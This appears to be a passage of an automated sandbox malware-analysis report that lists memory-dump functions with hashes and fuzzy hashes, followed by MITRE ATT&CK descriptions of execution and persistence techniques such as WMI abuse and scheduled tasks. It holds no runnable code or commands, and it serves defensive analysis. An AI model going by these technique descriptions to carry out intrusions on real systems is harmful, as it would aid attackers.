Instruction Fuzzy Hash: 59110A7590924A8FEB00FF78D465DED3BB0EF0131AF188176D04EC61A3DA389085C784

Function 00007FFAAC449C30 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaeccd5bc7e7d1773392a983eeb4543b8655aefa82b4f78a972d199a0eb1bf98
Instruction ID: 73ff4ff67312543a9e18c38c918465b77ccd2c95ce495a56e82ae9e790966040
Opcode Fuzzy Hash: aaeccd5bc7e7d1773392a983eeb4543b8655aefa82b4f78a972d199a0eb1bf98
Instruction Fuzzy Hash: 4E11517148E3C68FD7439F7088210D97FF0AF13224B4641EBD489CB5A3D66D5A5AC762

Function 00007FFAAC4113BE Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC40B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC40B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac40b000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ca6b26f02c5066dfb4f325efe5dce1be0836dc57f00eec7be01a2c1ebd63d9
Instruction ID: 35c827a7da9b28750c3d250ac1dd204db7cd4148b5d318c7cab84dd85fc18373
Opcode Fuzzy Hash: e0ca6b26f02c5066dfb4f325efe5dce1be0836dc57f00eec7be01a2c1ebd63d9
Instruction Fuzzy Hash: 52211930D9925ACFFB64DB6984487EDB7F0EB06309F1081B5D45ED3281DA38A989CF85

Function 00007FFAAC43B221 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a716b2805d04a78c2c9f020da1908b672d1efe2e58fc5597c82c2001f55bb96
Instruction ID: 4e22c5a75bbefb318b7f5626fc49a3ce132b8313ac14a1b9aca3d29fb1167af7
Opcode Fuzzy Hash: 0a716b2805d04a78c2c9f020da1908b672d1efe2e58fc5597c82c2001f55bb96
Instruction Fuzzy Hash: 2011E931808A4CDFEF45EF68C4996ED7BB0EF95300F0541A6E41DC7191DA35E548CB80

Function 00007FFAAC447A5D Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a46057e439a8a6daaedfcdd9ee01c46338effa1815f058bc897fab1ff4c854
Instruction ID: 2b19f635abb2acd3e08c7ec8c427091fccf9bb9fafd3cf8caa50021026f43b9d
Opcode Fuzzy Hash: 22a46057e439a8a6daaedfcdd9ee01c46338effa1815f058bc897fab1ff4c854
Instruction Fuzzy Hash: 88115532A0820DCFEB44EF18C45AAEA7BE0FF55309F144076D00EC6151CA30D595CBC0

Function 00007FFAAC44A29C Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17aa472a70c620e05f0e9b44680f9bf26904bda2e79764d2a10eb043f87913b4
Instruction ID: 2b867d8bd8e2b7d3175ed2ddc2c497d74808f3fa9287638b51b32047f9a38585
Opcode Fuzzy Hash: 17aa472a70c620e05f0e9b44680f9bf26904bda2e79764d2a10eb043f87913b4
Instruction Fuzzy Hash: D121C975D09209CBEB5CCB44D5996FDB7B1FB5A315F10803EE01AA7290CA35A886DF44

Function 00007FFAAC443571 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 236cb7a930a37d4d2c3ef5385e80f74deec92bf05024c40777c24898475c66f6
Instruction ID: 4258088038e41ca0fb1b54a8514b87c1b374f2121ce63f3dfb2df13cc2eb26a5
Opcode Fuzzy Hash: 236cb7a930a37d4d2c3ef5385e80f74deec92bf05024c40777c24898475c66f6
Instruction Fuzzy Hash: 07118F7091868DCFDB45DF68C8559AD7BB0FF55310B1441AAE41AC3192DB34D954CB81

Function 00007FFAAC4461E9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d9d2538d5958612d78d23eff937577a809c6045b79851f97566688dc08c19e
Instruction ID: c6e5839ffd36a367585df7c2c30c497b7a7849ddc29b526a4ba534d3896e3443
Opcode Fuzzy Hash: a8d9d2538d5958612d78d23eff937577a809c6045b79851f97566688dc08c19e
Instruction Fuzzy Hash: 70112A70808A4D8FDF85EF68C859AEA7BF0FF29301F0005AAE409D7261DB74E594CB80

Function 00007FFAAC4460A9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecbb7c789ceba4c51a246ff9b802eb940ea9814f522da94e9278c11b437cf9f
Instruction ID: 8980876b1246d6981810c776af1c0cd139304d58f15580db8f455f87a9e8ced3
Opcode Fuzzy Hash: fecbb7c789ceba4c51a246ff9b802eb940ea9814f522da94e9278c11b437cf9f
Instruction Fuzzy Hash: 9C111870908A8D8FDF85EF68C858AA97BF0FF29305F0441AAD449D7261D734D554CB81

Function 00007FFAAC43B1A9 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162d4639b1fbd36c61c2fc87da38dad81ddf60e93b8dd0e5afa78acfb745ac80
Instruction ID: cfa814f4b1d76c909683fcc4c4a51241eb3571fdaf1bb9157090159801cdf8d5
Opcode Fuzzy Hash: 162d4639b1fbd36c61c2fc87da38dad81ddf60e93b8dd0e5afa78acfb745ac80
Instruction Fuzzy Hash: 25113C70918A8D8FDF85EF68C859AAD7BF0FF69304F0441AAE409D72A1DB34D554CB81

Function 00007FFAAC4469C9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345555c43652b881da5a43382684721a6a0752aada7788f68c394f4f53651423
Instruction ID: b59466b011858b0ca38cf5a62049f9588cfc83b581290c90ad575474cb74b605
Opcode Fuzzy Hash: 345555c43652b881da5a43382684721a6a0752aada7788f68c394f4f53651423
Instruction Fuzzy Hash: 9B01407090868D8FDF85EF68C859AAA7FF0FF65301F04419AD419D71A2DB74D954CB80

Function 00007FFAAC43D8A9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5ec3438962b985e987fd0900bfaf10440c5156d2bb0d424d337c79b82608f8
Instruction ID: 7bbfa16a4afc175cbfac41413049aaee6296bf5492c424e5fe70a0bb698759fe
Opcode Fuzzy Hash: bb5ec3438962b985e987fd0900bfaf10440c5156d2bb0d424d337c79b82608f8
Instruction Fuzzy Hash: 4D01807091868D8FDB49EF28C899AD97FB0FF6A304F05419AE409C7251CB34E954CB81

Function 00007FFAAC4435A9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e797e5c7bc75f6890d56de12bf3c0d8c35a8e54f8be75193af5a99519c8d91fc
Instruction ID: 7b93666fa048cf92dda69b62aeaadcb8d8686b444af980a802d8bc1a0091739e
Opcode Fuzzy Hash: e797e5c7bc75f6890d56de12bf3c0d8c35a8e54f8be75193af5a99519c8d91fc
Instruction Fuzzy Hash: 2601297090868DCFDB85EF68C855AAA7BB0FF65300F0401AAD419D72A2DB34DA54CB80

Function 00007FFAAC43CC39 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e34f42235b71f1c074687a16f89675181b540f67cdcb728d0abda22ca9000a
Instruction ID: 09bafd1bf71b2b2ff8e03a38bd6aa03d9457e3f0e962586218ed71f6569a5d10
Opcode Fuzzy Hash: 09e34f42235b71f1c074687a16f89675181b540f67cdcb728d0abda22ca9000a
Instruction Fuzzy Hash: A001403091968C8FDB45EF28C859A997FF0FF6A304F0541AAE449C7162D735D954CB81

Function 00007FFAAC410982 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC40B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC40B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac40b000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e14605d99cd8ea85c9dbadedcd3c80de3ac16c7b3528f84a478da067721bf1d
Instruction ID: fa488672bfc46b0102b746ed61e48c8c0919296b91d731784daa29970c3affbd
Opcode Fuzzy Hash: 0e14605d99cd8ea85c9dbadedcd3c80de3ac16c7b3528f84a478da067721bf1d
Instruction Fuzzy Hash: D1016DB4D4861ACBFF58DF44C858ABE7BB1FB11304F00453AC01A97291CF34A9068B84

Function 00007FFAAC449919 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce5342f77155b56ea3e040d57a0fff92fda23878b945c99724e025f3c39cba93
Instruction ID: 6ace97cabe4d7c837710048aa8df87c571f6d681830ffe8c3312466865a1a2c3
Opcode Fuzzy Hash: ce5342f77155b56ea3e040d57a0fff92fda23878b945c99724e025f3c39cba93
Instruction Fuzzy Hash: 6A01487190868D8FDF85EF68C858AAEBFB0FF25300F0445AAD419D72A2DB34D954CB80

Function 00007FFAAC4460C0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b45a2da9dcb0ebef287acb9abd5a34960e37faa2f45f7ae727b0fa9f86c2b0
Instruction ID: 57c5b357a8a2bdb66b179e352d8a66cd974709103857e7bdd2d897941acb33dc
Opcode Fuzzy Hash: b9b45a2da9dcb0ebef287acb9abd5a34960e37faa2f45f7ae727b0fa9f86c2b0
Instruction Fuzzy Hash: 8501D670914A0D8FDF84EF68C848AEE7BF0FB28305F00456AA819D3260DB30E594CB80

Function 00007FFAAC446200 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5566cd7a9dc99a8b51444e99a3cf70712c9373b72f7cdf83f1344a7efdaed863
Instruction ID: 0330bcb445ff4586e9acacfd79c93e89cfc60c5cd925ded95d7bc5340dda3316
Opcode Fuzzy Hash: 5566cd7a9dc99a8b51444e99a3cf70712c9373b72f7cdf83f1344a7efdaed863
Instruction Fuzzy Hash: 7A01D670914A0D9FDF84EF68C848AEEBBF0FB28305F00456AA819D3260DB30E594CB80

Function 00007FFAAC44A5E9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebfda8910c419ff0b24f770a06c4a1a1ddddc4853856605b9c01c156eb7a7a44
Instruction ID: 3a2c94e480642c2fcf2f516fe5f373b760ba9e3e846cdf2321d96d057782c5e4
Opcode Fuzzy Hash: ebfda8910c419ff0b24f770a06c4a1a1ddddc4853856605b9c01c156eb7a7a44
Instruction Fuzzy Hash: 73018F3080878D8FCB59DF14C855AEA7FB0FF2A304F0441AAE409C72A2DB35D994CB80

Function 00007FFAAC44A6A9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d467ff360363f9b70c4f1fc14917ecc2dcc9f7b70889fc9d0e57dce910969e1
Instruction ID: f91c49bc52fef86f4534c7008bb5bd3d0deb0c8c96bb01aec66c17733138cfc6
Opcode Fuzzy Hash: 0d467ff360363f9b70c4f1fc14917ecc2dcc9f7b70889fc9d0e57dce910969e1
Instruction Fuzzy Hash: D101713090868C8FDB45DF24C855AAA7FB0FF15304F0041AAD409C71A2D735D994CB80

Function 00007FFAAC4447E9 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8193186342ef2627a0fc782edaeef29e5f829012ca9e238541fc20d464f809
Instruction ID: 13d70d36aec8049de9b3955b3def541ab30f40bc8ab156d1f717c6666157edf1
Opcode Fuzzy Hash: 0b8193186342ef2627a0fc782edaeef29e5f829012ca9e238541fc20d464f809
Instruction Fuzzy Hash: 9A017C7090868DCFDB85EF64C8546EABBB0FF15301F0405AAD41AC71A2DB34D954CB90

Function 00007FFAAC43B289 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0360c72197e8dcb0e26bf2303975407b8fd4dacf0df314051cc1fafa8f11633a
Instruction ID: 9c1c8314f02b5ace8c2edcf703686b71f40dd40401324fdb8171dec18da357f3
Opcode Fuzzy Hash: 0360c72197e8dcb0e26bf2303975407b8fd4dacf0df314051cc1fafa8f11633a
Instruction Fuzzy Hash: 4D012C30909A8C8FDB86EF24C859AAD7FB0FF66304F0541DAD409C71A2DA35D998CB81

Function 00007FFAAC442CD9 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13412ca2b0da265dc5d217c3a4e8b0cb609ce16998dedb88d65db80a3a2e7445
Instruction ID: 845a777df455184923107e67160f839e8cbe422f5a18d3240333b324f6061049
Opcode Fuzzy Hash: 13412ca2b0da265dc5d217c3a4e8b0cb609ce16998dedb88d65db80a3a2e7445
Instruction Fuzzy Hash: 3A018B3090D68C8FDB89EF24C858AA97FB0FF2A300F1441EAD409C71A2DB35D994CB80

Function 00007FFAAC43D8C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a239b94b275badcf5cf9735d66671c1c04822adfb1296aac553cb8a1dd41eb04
Instruction ID: 5571e7cee1430cd9d46a08969ce558eb12fb825edf56f406d7d18f43ec41b3a4
Opcode Fuzzy Hash: a239b94b275badcf5cf9735d66671c1c04822adfb1296aac553cb8a1dd41eb04
Instruction Fuzzy Hash: CAF0C970914A4C9FDF48EF58C849AE97BF0FB68305F00456AA81DD3250DB30E594CB81

Function 00007FFAAC446759 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1154166d470a841710596a91ccfc4cd18c3f3c6dd1b393a5098f824be2374f5e
Instruction ID: d6a18f79a1cf2b7b0c8f73820c639389b003d69d14c2ed33fb6564da0f90a79a
Opcode Fuzzy Hash: 1154166d470a841710596a91ccfc4cd18c3f3c6dd1b393a5098f824be2374f5e
Instruction Fuzzy Hash: EB01A2B1C0D7C9CFEB55AB64C8596E97FA0BF16200F0441FBE509D71D3EA3894588742

Function 00007FFAAC4481C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbec3f1b6ad7f3c9981bb2ec5847e31302bcbfecdf24b1d00f53fc206b88e24
Instruction ID: 34329f244922d87a9e06f095723a7e65df792234013ae25098022a6c94e454fd
Opcode Fuzzy Hash: dfbec3f1b6ad7f3c9981bb2ec5847e31302bcbfecdf24b1d00f53fc206b88e24
Instruction Fuzzy Hash: 26F028A080D789DFF755A774891D6A87FE0EF02300F0441F7D41DC60E3D93895588342

Function 00007FFAAC43B17F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa10e175c4073c52f28488201d74955d081243c935a6ef0941c56abb87dcaba7
Instruction ID: 4d6dc7264e277f528dd8c56433328ad8ec791a3c58c1d9d99d3f736dce2438dc
Opcode Fuzzy Hash: aa10e175c4073c52f28488201d74955d081243c935a6ef0941c56abb87dcaba7
Instruction Fuzzy Hash: 75F0493191844DDFDF84EF98C888DAEB7B1FF28344B0441AAD81ED7251CA31E951CB80

Function 00007FFAAC43B2A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d461409a86a236d8729de976d16166abad94e6f5490806f34e71ad8984e1c006
Instruction ID: 21ebf7da144249800017fbb18a92257c49467e84ee0e5ddc8867e6e77a9af3c4
Opcode Fuzzy Hash: d461409a86a236d8729de976d16166abad94e6f5490806f34e71ad8984e1c006
Instruction Fuzzy Hash: 4AF0A93091490D9FDF85EF58C448AAA7BB1FB69305F50419AA41DD3250DB319594CB80

Function 00007FFAAC447A58 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c2aba7224dfd3f779dc43dfcfc2c343d68f799b8af5db69a72b00bf1335587
Instruction ID: 91522dc0facbfd33f3f43cf90c085a5403d79ab5b2dcb14eab2bf85d71a1081c
Opcode Fuzzy Hash: f6c2aba7224dfd3f779dc43dfcfc2c343d68f799b8af5db69a72b00bf1335587
Instruction Fuzzy Hash: 0EF0F930904A0D9FDB84EF54C448AAABBA0FB69308F1041AAE41ED3250DB31E694CB80

Function 00007FFAAC442050 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bf1bb6c4ed614314b63b7fa3d5bd884960f858441a6eb222bdd87ff597e871
Instruction ID: 44b1837f8a8d7ec19052258536b83388d07e28a184d26ad9a21a5afaa35fd721
Opcode Fuzzy Hash: e2bf1bb6c4ed614314b63b7fa3d5bd884960f858441a6eb222bdd87ff597e871
Instruction Fuzzy Hash: A5F0F93491490D9FDF84EF54C448AAABBA0FB68305F1041AAE41ED3250CB31A594CB80

Function 00007FFAAC40FA99 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC40B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC40B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac40b000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449aca19a0e679f5a9d4cba81a8715524dfaa9294ad9dbb8c04d4932f6b46240
Instruction ID: f3fdb34cd773a6b90d6025a1bc8302613f301e8225d8480f927e749d8d7e2e81
Opcode Fuzzy Hash: 449aca19a0e679f5a9d4cba81a8715524dfaa9294ad9dbb8c04d4932f6b46240
Instruction Fuzzy Hash: D5F05E3190E7C98FEB56EF24891569DBFB0AF52310F4945EAD90CC7092D638D91CC781

Function 00007FFAAC442D55 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be858ebe905c19cf2cb7e26e81b4a675d80c6f5eb95a916fffe68a7db645bec
Instruction ID: b5d79c8f9a98a8ad5cf53ace281cdecb07d1c7a06a5c32f4bc0cb84de096deed
Opcode Fuzzy Hash: 2be858ebe905c19cf2cb7e26e81b4a675d80c6f5eb95a916fffe68a7db645bec
Instruction Fuzzy Hash: A6E04676A0940D9FDF19CF14C864CAD7761EF66315B2541A6D00FD7150DA31E946CB80

Function 00007FFAAC44A671 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415d1a698f71d6261abe2ad56ea235ad2041ba19544762569411c61487a2f57d
Instruction ID: dff45c807fd21e7466ab1f3197ca683fb6021a5bd116a0f19f4ff0fba63a7af4
Opcode Fuzzy Hash: 415d1a698f71d6261abe2ad56ea235ad2041ba19544762569411c61487a2f57d
Instruction Fuzzy Hash: 30D02EB2A08A48CBFB004B04E44A0FCB720EF02204F200474F00E82081DF24E98E86D2

Function 00007FFAAC446E44 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1883586709.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffaac43a000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5c16f5ffad3841c68b38133e47e07aae0ae0dee90dea55cf0f2cc2b4df6411
Instruction ID: 9e06c55f2395484a00f6aa5ed6abb21737dbc5bd6b2b4fa48198016b7ee4f74e
Opcode Fuzzy Hash: fd5c16f5ffad3841c68b38133e47e07aae0ae0dee90dea55cf0f2cc2b4df6411
Instruction Fuzzy Hash: B1D0A964E05558CBFBA5AB0488897E567F2FB5A308F2042A5C08EC3102CE2448018B84

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

